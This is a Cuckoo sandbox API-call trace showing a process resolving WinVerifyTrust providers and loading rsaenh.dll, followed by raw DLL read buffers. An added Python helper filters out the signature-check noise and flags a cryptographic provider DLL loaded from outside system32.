| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00L\x00o\x00a\x00d\x00S\x00i\x00g\x00n\x00a\x00t\x00u\x00r\x00e\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00C\x00h\x00e\x00c\x00k\x00C\x00e\x00r\x00t\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | FAILURE | 0x00000002 | |
| 19:40:26,313 | 252 | RegOpenKeyExW | Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW | Handle => 0x0000018c Data => S\x00o\x00f\x00t\x00p\x00u\x00b\x00C\x00l\x00e\x00a\x00n\x00u\x00p\x00\x00\x00 ValueName => $Function | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => WintrustCertificateTrust FunctionAddress => 0x76c33373 ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SoftpubAuthenticode FunctionAddress => 0x76c3386c ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SoftpubInitialize FunctionAddress => 0x76c3342c ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SoftpubLoadMessage FunctionAddress => 0x76c334e6 ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SoftpubLoadSignature FunctionAddress => 0x76c333c4 ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SoftpubCheckCert FunctionAddress => 0x76c393db ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SoftpubCleanup FunctionAddress => 0x76c335dc ModuleHandle => 0x76c30000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtOpenKey | DesiredAccess => 131097 KeyHandle => 0x0000018c ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExA | Handle => 0x00000000 Registry => 0x0000018c SubKey => SOFTWARE\Microsoft\Cryptography\Providers\Type 001 | FAILURE | 0x00000002 | |
| 19:40:26,313 | 252 | RegOpenKeyExA | Handle => 0x0000018c Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 001 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA | Handle => 0x0000018c DataLength => 40 ValueName => Name Type => 1 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA | Handle => 0x0000018c Data => Microsoft Strong Cryptographic Provider\x00 ValueName => Name | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey | Handle => 0x0000018c | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExA | Handle => 0x0000018c Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic Provider | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA | Handle => 0x0000018c Data => 1 ValueName => Type | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA | Handle => 0x0000018c DataLength => 11 ValueName => Image Path Type => 1 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA | Handle => 0x0000018c Data => rsaenh.dll\x00 ValueName => Image Path | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | LdrGetDllHandle | ModuleHandle => 0x00000000 FileName => rsaenh.dll | FAILURE | 0xc0000135 | 1 time |
| 19:40:26,313 | 252 | NtOpenKey | DesiredAccess => 1 KeyHandle => 0x00000190 ObjectAttributes => \Registry\MACHINE\System\CurrentControlSet\Control\Session Manager | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryValueKey | KeyHandle => 0x00000190 ValueName => SafeProcessSearchMode | FAILURE | 0xc0000034 | |
| 19:40:26,313 | 252 | NtCreateFile | ShareAccess => 1 FileName => C:\WINDOWS\system32\rsaenh.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryInformationFile | FileHandle => 0x00000190 FileInformation => \x000\x03\x00\x00\x00\x00\x00\x00.\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateSection | ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000194 FileHandle => 0x00000190 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | ZwMapViewOfSection | SectionOffset => 0x0013ec28 SectionHandle => 0x00000194 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateFile | ShareAccess => 1 FileName => C:\WINDOWS\system32\rsaenh.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateSection | ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000194 FileHandle => 0x00000190 | SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | ZwMapViewOfSection | SectionOffset => 0x0013ec8c SectionHandle => 0x00000194 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 | SUCCESS | 0x00000000 | |
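The registry and loader calls above are the standard WinVerifyTrust provider resolution: process 252 walks HKLM\Software\Microsoft\Cryptography\Providers\Trust\<step>\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} (WINTRUST_ACTION_GENERIC_VERIFY_V2) to find the Softpub* exports in WINTRUST.DLL (the optional DiagnosticPolicy step is expected to be absent), then resolves the default Type 1 CSP through Defaults\Provider Types\Type 001 to Microsoft Strong Cryptographic Provider, reads its Image Path (rsaenh.dll), and maps that DLL from C:\WINDOWS\system32. That is benign noise from a signature check, and it buries the entries an analyst actually wants: registry keys the process opened in its own right, files it opened, and whether the CSP named in Image Path was really loaded from the system directory. The Python below is an added triage example written for this page, not part of the Cuckoo report or its tooling. It parses a constructed sample made of entries copied from the trace above in the same flattened layout, folds the WinVerifyTrust sequence away by tracking the handle each trust key returned, and assumes the XP guest's system directory is C:\WINDOWS\system32.

```python
# Triage helper for a Cuckoo 1.2 behaviour trace in the flattened layout seen on this page.
import re

# Constructed sample: entries copied from the trace above (pid 252). The
# parser also accepts the same fields joined into one table row per call.
SAMPLE_TRACE = r"""
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x0000018c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExW |
Handle => 0x0000018c Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => $DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegCloseKey |
Handle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} |
FAILURE | 0x00000002 | |
| 19:40:26,313 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x0000018c SubKey => SOFTWARE\Microsoft\Cryptography\Providers\Type 001 |
FAILURE | 0x00000002 | |
| 19:40:26,313 | 252 | RegOpenKeyExA |
Handle => 0x0000018c Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic Provider |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | RegQueryValueExA |
Handle => 0x0000018c Data => rsaenh.dll\x00 ValueName => Image Path |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\rsaenh.dll DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
"""

ENTRY_RE = re.compile(
    r"\|\s*(?P<time>\d\d:\d\d:\d\d,\d{3})\s*\|\s*(?P<pid>\d+)\s*\|\s*(?P<api>\w+)\s*\|"
    r"(?P<args>.*?)(?P<status>SUCCESS|FAILURE)\s*\|\s*(?P<ret>0x[0-9a-fA-F]+)\s*\|", re.S)
ARG_RE = re.compile(r"(\w+) =>\s?(.*?)(?=\s*\w+ =>|\s*$)")  # a value runs to the next "Key =>"
HIVES = {"0x80000000": "HKCR", "0x80000001": "HKCU", "0x80000002": "HKLM", "0x80000003": "HKU"}
# WINTRUST_ACTION_GENERIC_VERIFY_V2; WinVerifyTrust looks it up under Providers\Trust\<step>\<GUID>.
AUTHENTICODE_V2 = "{00aac56b-cd44-11d0-8cc2-00c04fc295ee}"
TRUST_PREFIX = "software\\microsoft\\cryptography\\providers\\trust\\"


def parse_trace(text):
    """One dict per API call: time, pid, api, args (Key => value pairs), ok, ret."""
    entries = []
    for m in ENTRY_RE.finditer(text):
        args = m.group("args").strip().strip("|").strip()
        entries.append({"time": m.group("time"), "pid": int(m.group("pid")),
                        "api": m.group("api"), "args": dict(ARG_RE.findall(args)),
                        "ok": m.group("status") == "SUCCESS", "ret": int(m.group("ret"), 16)})
    return entries


def reg_path(entry):
    """Hive-qualified key for RegOpenKeyEx* calls ('handle:0x..' when the root is a handle)."""
    a = entry["args"]
    root = a.get("Registry", "?")
    return HIVES.get(root, "handle:" + root) + "\\" + a["SubKey"] if "SubKey" in a else None


def split_wintrust_noise(entries):
    """(noise, rest): noise is each trust-provider RegOpenKeyEx* together with the
    RegQueryValueEx*/RegCloseKey calls made on the handle it returned."""
    noise, rest, trust_handles = [], [], set()
    for e in entries:
        api, h = e["api"], e["args"].get("Handle")
        sub = e["args"].get("SubKey", "").lower()
        if api.startswith("RegOpenKeyEx") and sub.startswith(TRUST_PREFIX) and AUTHENTICODE_V2 in sub:
            if e["ok"]:
                trust_handles.add(h)
            noise.append(e)
        elif api.startswith(("RegQueryValueEx", "RegCloseKey")) and h in trust_handles:
            if api == "RegCloseKey":
                trust_handles.discard(h)
            noise.append(e)
        else:
            if api.startswith("RegOpenKeyEx") and e["ok"]:
                trust_handles.discard(h)  # the handle value now refers to another key
            rest.append(e)
    return noise, rest


def triage(entries, system_dir="C:\\WINDOWS\\system32"):
    """What to read first once the WinVerifyTrust noise is folded away.
    system_dir is an assumption for the XP guest used in this report."""
    noise, rest = split_wintrust_noise(entries)
    files = [e["args"]["FileName"] for e in rest if e["api"] == "NtCreateFile"]
    csp_names = {e["args"]["Data"].replace(r"\x00", "").lower() for e in rest
                 if e["api"].startswith("RegQueryValueEx")
                 and e["args"].get("ValueName") == "Image Path" and e["args"].get("Data")}
    prefix = system_dir.lower().rstrip("\\") + "\\"
    return {
        "wintrust_noise": len(noise),
        "reg_keys": [reg_path(e) for e in rest if reg_path(e)],
        "failed_reg_keys": [reg_path(e) for e in rest if reg_path(e) and not e["ok"]],
        "files_opened": files,
        "csp_image_paths": sorted(csp_names),
        # A CSP named by a bare Image Path must come from the system directory;
        # the same file name opened anywhere else is a CSP-hijack candidate.
        "csp_loaded_outside_system32": [f for f in files if f.lower().rsplit("\\", 1)[-1]
                                        in csp_names and not f.lower().startswith(prefix)],
    }


if __name__ == "__main__":
    for key, value in triage(parse_trace(SAMPLE_TRACE)).items():
        print(f"{key}: {value}")
```

On the sample, the four trust-provider calls collapse to one count, the failed open of Providers\Type 001 under the user hive and the successful open of the CSP key remain as the registry activity worth a glance, and rsaenh.dll is confirmed to have been opened from the system directory. Re-running triage with a different system_dir shows how a CSP opened from anywhere else would surface as a hijack candidate.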
| 19:40:26,313 | 252 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x14_\xd9\x13P>\xb7@P>\xb7@P>\xb7@w\xf8\xda@H>\xb7@\x931\xb8@Y>\xb7@P>\xb6@\xc5>\xb7@\x931\xea@[>\xb7@\x931\xeb@Q>\xb7@\x931\xe9@Q>\xb7@\x931\xd7@Q>\xb7@\x931\xe8@\x7f>\xb7@\x931\xed@Q>\xb7@RichP>\xb7@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x04\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtQueryInformationFile |
FileHandle => 0x00000190 FileInformation => P\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtSetInformationFile |
FileHandle => 0x00000190 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => \x03\x00\x00\x00\x00\x00\x04\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x000\xea\x02\x00\xbb\x02\x00\x00\xc4\xdd\x02\x00x\x00\x00\x00\x000\x03\x00P\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x03\x00\xc8\x10\x00\x00@\x12\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10e\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x008\x02\x00\x00\xbc\xdb\x02\x00\xe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.text\x00\x00\x00\xeb\xdc\x02\x00\x00\x10\x00\x00\x00\xde\x02\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00`.data\x00\x00\x00 0\x00\x00\x00\xf0\x02\x00\x00*\x00\x00\x00\xe2\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0.rsrc\x00\x00\x00P\x0c\x00\x00\x000\x03\x00\x00\x0e\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => \x00\x04\x00\x08\x00\x00\x00\x08\x00\x04\x01\x00 \x04\x01\x08\x00\x00\x00\x00 \x04\x01\x00\x00\x00\x00\x08\x00\x04\x00\x00 \x00\x01\x00 \x04\x00\x08\x00\x04\x00\x00\x00\x00\x00\x00 \x04\x01\x08 \x00\x01\x08\x00\x04\x01\x08 \x04\x00\x00\x00\x00\x01\x00\x00\x04\x01\x00 \x00\x01\x08\x00\x04\x00\x08 \x04\x00\x00 \x00\x00\x00 \x04\x01\x00\x00\x00\x01\x08 \x00\x00\x08@\x00\x00\x80@\x00 \x00\x00\x00\x00\x00\x00 \x80@\x00 \x00\x00 \x00\x00@ \x00\x80\x00\x00 \x00@ \x00\x00@ \x80\x00 \x00\x00\x00\x00\x80\x00 \x00\x80@\x00\x00\x80\x00\x00 \x80@ \x00\x00\x00 \x00@ \x00\x80@\x00 \x80\x00\x00\x00\x00\x00 \x00\x00@\x00\x00\x00\x00 \x80@\x00 \x80@ \x80\x00\x00 \x80\x00\x00\x00\x80@ \x00\x00@\x00\x00\x00\x00 \x00@ \x00\x00 \x00\x80@ \x00\x00\x00\x00\x00\x80\x00 \x00\x80@ \x00\x00 \x80@\x00 \x00\x00\x00\x00\x00 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => '\x9e\x9e\xb9\xd9\xe1\xe18\xeb\xf8\xf8\x13+\x98\x98\xb3"\x11\x113\xd2ii\xbb\xa9\xd9\xd9p\x07\x8e\x8e\x893\x94\x94\xa7-\x9b\x9b\xb6<\x1e\x1e"\x15\x87\x87\x92\xc9\xe9\xe9 \x87\xce\xceI\xaaUU\xffP((x\xa5\xdf\xdfz\x03\x8c\x8c\x8fY\xa1\xa1\xf8 \x89\x89\x80\x1a
\x17e\xbf\xbf\xda\xd7\xe6\xe61\x84BB\xc6\xd0hh\xb8\x82AA\xc3)\x99\x99\xb0Z--w\x1e\x0f\x0f\x11{\xb0\xb0\xcb\xa8TT\xfcm\xbb\xbb\xd6,\x16\x16:\xa5\xc6cc\x84\xf8||\x99\xeeww\x8d\xf6{{
\xff\xf2\xf2\xbd\xd6kk\xb1\xdeooT\x91\xc5\xc5P`00\x03\x02\x01\x01\xa9\xcegg}V++\x19\xe7\xfe\xfeb\xb5\xd7\xd7\xe6M\xab\xab\x9a\xecvvE\x8f\xca\xca\x9d\x1f\x82\x82@\x89\xc9\xc9\x87\xfa}}\x15\xef\xfa\xfa\xeb\xb2YY\xc9\x8eGG\x0b\xfb\xf0\xf0\xecA\xad\xadg\xb3\xd4\xd4\xfd_\xa2\xa2\xeaE\xaf\xaf\xbf#\x9c\x9c\xf7S\xa4\xa4\x96\xe4rr FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => m\xd6G\x13\x9a\xd7a\x8c7\xa1\x0czY\xf8\x14\x8e\xeb\x13<\x89\xce\xa9'\xee\xb7a\xc95\xe1\x1c\xe5\xedzG\xb1<\x9c\xd2\xdfYU\xf2s?\x18\x14\xceys\xc77\xbfS\xf7\xcd\xea_\xfd\xaa[\xdf=o\x14xD\xdb\x86\xca\xaf\xf3\x81\xb9h\xc4>8$4,\xc2\xa3@_\x16\x1d\xc3r\xbc\xe2%\x0c(<I\x8b\xff
\x95A9\xa8\x01q\x08\x0c\xb3\xde\xd8\xb4\xe4\x9cdV\xc1\x90{\xcb\x84a\xd52\xb6pHl\t\xd0\xb8WBPQ\xf4\xa7S~Ae\xc3\x1a\x17\xa4\x96:'^\xcb;\xabk\xf1\x1f\x9dE\xab\xac\xfaX\x93K\xe3\x03U 0\xfa\xf6\xadvm\x91\x88\xccv%\xf5\x02L\xfcO\xe5\xd7\xd7\xc5*\xcb\x80&5D\x8f\xb5b\xa3I\xde\xb1Zg%\xba\x1b\x98E\xea\x0e\xe1]\xfe\xc0\x02\xc3/u\x12\x81L\xf0\xa3\x8dF\x97\xc6k\xd3\xf9\xe7\x03\x8f_\x95\x15\x92\x9c\xeb\xbfmz\xda\x95RY-\xd4\xbe\x83\xd3Xt!)I\xe0i FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,313 | 252 | NtReadFile |
Buffer => \xfb\x0bA.\x9a\xd7a\x8c\x94\xdel\x87\x86\xc5{\x9a\x88\xccv\x91\xa2\xf3U\xa0\xac\xfaX\xab\xbe\xe1O\xb6\xb0\xe8B\xbd\xea\x9f \xd4\xe4\x96\x04\xdf\xf6\x8d\x13\xc2\xf8\x84\x1e\xc9\xd2\xbb=\xf8\xdc\xb20\xf3\xce\xa9'\xee\xc0\xa0*\xe5zG\xb1<tN\xbc7fU\xab*h\\xa6!Bc\x85\x10Lj\x88\x1b^q\x9f\x06Px\x92
\x0f\xd9d\x04\x06\xd4o\x16\x1d\xc3r\x18\x14\xcey2+\xedH<"\xe0C.9\xf7^ 0\xfaU\xec\x9a\xb7\x01\xe2\x93\xba
\xf0\x88\xad\x17\xfe\x81\xa0\x1c\xd4\xbe\x83-\xda\xb7\x8e&\xc8\xac\x99;\xc6\xa5\x940\x9c\xd2\xdfY\x92\xdb\xd2R\x80\xc0\xc5O\x8e\xc9\xc8D\xa4\xf6\xebu\xaa\xff\xe6~\xb8\xe4\xf1c\xb6\xed\xfch\x0c
g\xb1\x02\x03j\xba\x10\x18}\xa7\x1e\x11p\xac4.S\x9d:'^\x96(<I\x8b&5D\x80|B\x0f\xe9rK\x02\xe2`P\x15\xffnY\x18\xf4Df;\xc5Jo6\xceXt!\xd3 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xce>'\xca\x07\xc2\xc0!\xc7\xb8\x86\xd1\x1e\xeb\xe0\xcd\xd6}\xda\xeax\xd1n\xee\x7fO}\xf5\xbao\x17r\xaag\xf0\x06\xa6\x98\xc8\xa2\xc5}c
\xae
\xf9\xbe\x04\x98?\x11\x1bG\x1c\x135\x0bq\x1b\x84}\x04#\xf5w\xdb(\x93$\xc7@{\xab\xca2\xbc\xbe\xc9\x15
\xbe\x9e<L
\x10\x9c\xc4g\x1dC\xb6B>\xcb\xbe\xd4\xc5L*~e\xfc\x9c)\x7fY\xec\xfa\xd6:\xabo\xcb_\x17XGJ\x8c\x19Dl\x98/\x8aB\x91D7q\xcf\xfb\xc0\xb5\xa5\xdb\xb5\xe9[\xc2V9\xf1\x11\xf1Y\xa4\x82?\x92\xd5^\x1c\xab\x98\xaa\x07\xd8\x01[\x83\x12\xbe\x851$\xc3}\x0cUt]\xber\xfe\xb1\xde\x80\xa7\x06\xdc\x9bt\xf1\x9b\xc1\xc1i\x9b\xe4\x86G\xbe\xef\xc6\x9d\xc1\x0f\xcc\xa1\x0c$o,\xe9-\xaa\x84tJ\xdc\xa9\xb0\\xda\x88\xf9vRQ>\x98m\xc61\xa8\xc8'\x03\xb0\xc7\x7fY\xbf\xf3\x0b\xe0\xc6G\x91\xa7\xd5Qc\xca\x06g))\x14\x85
\xb7' FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \x00\x00\x00\xffu\x18\xffu\x14\xffu\x10\xffvxVh\x90\x98\x01h\xe8\xcb\xf9\xff\xff\x85\xc0\x0f\x85\xc0\x00\x00\x009E\x10\x0f\x84\xb5\x00\x00\x00\x8bE\x0c\x85\xc0\x0f\x84\xaa\x00\x00\x00\x81x\x04\x05\x80\x00\x00\x0f\x85\x9d\x00\x00\x00\x83~`\x01\x0f\x85\x93\x00\x00\x00\x8bNxW\x8bx\x10\x8b\xd1\x83\xc7\x04\xc1\xe9\x02\x83\xc6,\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4_\xebq\xb8\x08\x00 \x80\xebp\xffu\x18\xffu\x14\xffu\x10j\x08Vh\xa0t\x01h\xeb$\xffu\x18\xffu\x14\xffu\x10j\x08Vh\xd0f\x01h\xeb\x11\xffu\x18\xffu\x14\xffu\x10j\x08Vh V\x01h\xe87\xf9\xff\xff\x85\xc0u09E\x10t)\x8bE\x0c\x85\xc0t"\x81x\x04\x05\x80\x00\x00u\x19\x83~`\x01u\x13\x8bV,\x8bH\x10\x89Q\x04\x8bV0\x89Q\x08\x83H4\x013\xc0^]\xc2\x14\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x83\xec\x14V3\xf6\xf7E\x18\xbf\xff\xff\xff\x89u FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => v\x81\xf9\x02f\x00\x00tX\x81\xf9\x03f\x00\x00t:\x81\xf9 f\x00\x00t2\x81\xf9
f\x00\x00vl\x81\xf9\x10f\x00\x00wd\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00\xffpxPh\x90\x98\x01h\xe8\xfe\xe7\xff\xff\x85\xc0tF\x8b\xf0\xebf\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00j\x08Ph\xa0t\x01h\xeb\xdd\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00j\x08Ph\xd0f\x01h\xeb\xc7\xffu\x14\x8dM\xf0Q\xffu\xf4j\x00j\x08Ph V\x01h\xeb\xb1\x8bu\xf0\x8bE\x10\x8bU\xec\x03\xf2\x8b\xc8\x8b\xd1\xc1\xe9\x02\x8d{\x14\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\x89\x033\xff3\xf6\x83}\xf4\x00t\x08\xffu\xf4\xe8\xf0\xa0\x01\x00\x8bE\xfc\x85\xc0t\x12\x83\xc0\xf8\x818Heapu\x07P\xff\x15\x1c \x03h\x8bE\xf8\x85\xc0t\x12\x83\xc0\xf8\x818Heapu\x07P\xff\x15\x1c \x03h\x8b\xc6\x8de\xe0_^[\xc9\xc2\x10\x00\xcc\xcc\xcc FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xe9\x02\xf3\xa5\x8b\xc8\x8bE\xfc\x83\xe1\x03\xf3\xa4\x8bu\x08\x03\xc3\x01E\x14\x8b}\x14\x8b\xcb\x8b\xc1\xc1\xe9\x02\xf3\xa5\x8b\xc8\x8bE\x08\x83\xe1\x03\xf3\xa4\x8bJ\x04\x8d4\x18\x8bE\x14\xc1\xe9\x03\x8d<\x18\x03}\xfc\x8b\xc1\xc1\xe9\x02\xf3\xa5\x8b\xc8\x8bE\xf4\x83\xc0\xecP\xffu\x0c\x83\xe1\x03\xf3\xa4\xe8\x9f\x91\x01\x00\x85\xc0t\x043\xc0\xeb&\x8b}\xf0\x8bu\xf43\xc0@\x8bM\x18\x899\x8bM\x10\x891\xeb\x113\xc0\xeb\xf0\x8bE\x18\x898\x8bE\x10\x8903\xc0@_[^\xc9\xc2\x14\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x8bE\x0c%\x00\xe0\x00\x00=\x00\x80\x00\x00u\x043\xc0\xeb\x1a\x8bE\x08\x8b\x80\x84\x01\x00\x00j\x00\xffu\x0c\xff4\x85(\x18\x03h\xe8c\xe1\x01\x00]\xc2\x08\x00\xcc\xcc\xcc\xcc\xcc\x8b\xffU\x8b\xec\x8bE\x0c\x8bM\x14W3\xff-\x00$\x00\x00\x899t\x19-\x01(\x00\x00td\x83\xe8\x03tTHtFHtY-\xfaW\x00\x00u\x06 FileHandle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,323 | 252 | NtReadFile |
Buffer => \xfa\x10f\x00\x00w\x05\x8bIx\xeb\x8a\x83&\x00\xebA\xc7\x06@\x00\x00\x00\xeb9\x8bM\x1c\x8bI\x10\x85\xc9u\x07\xb9
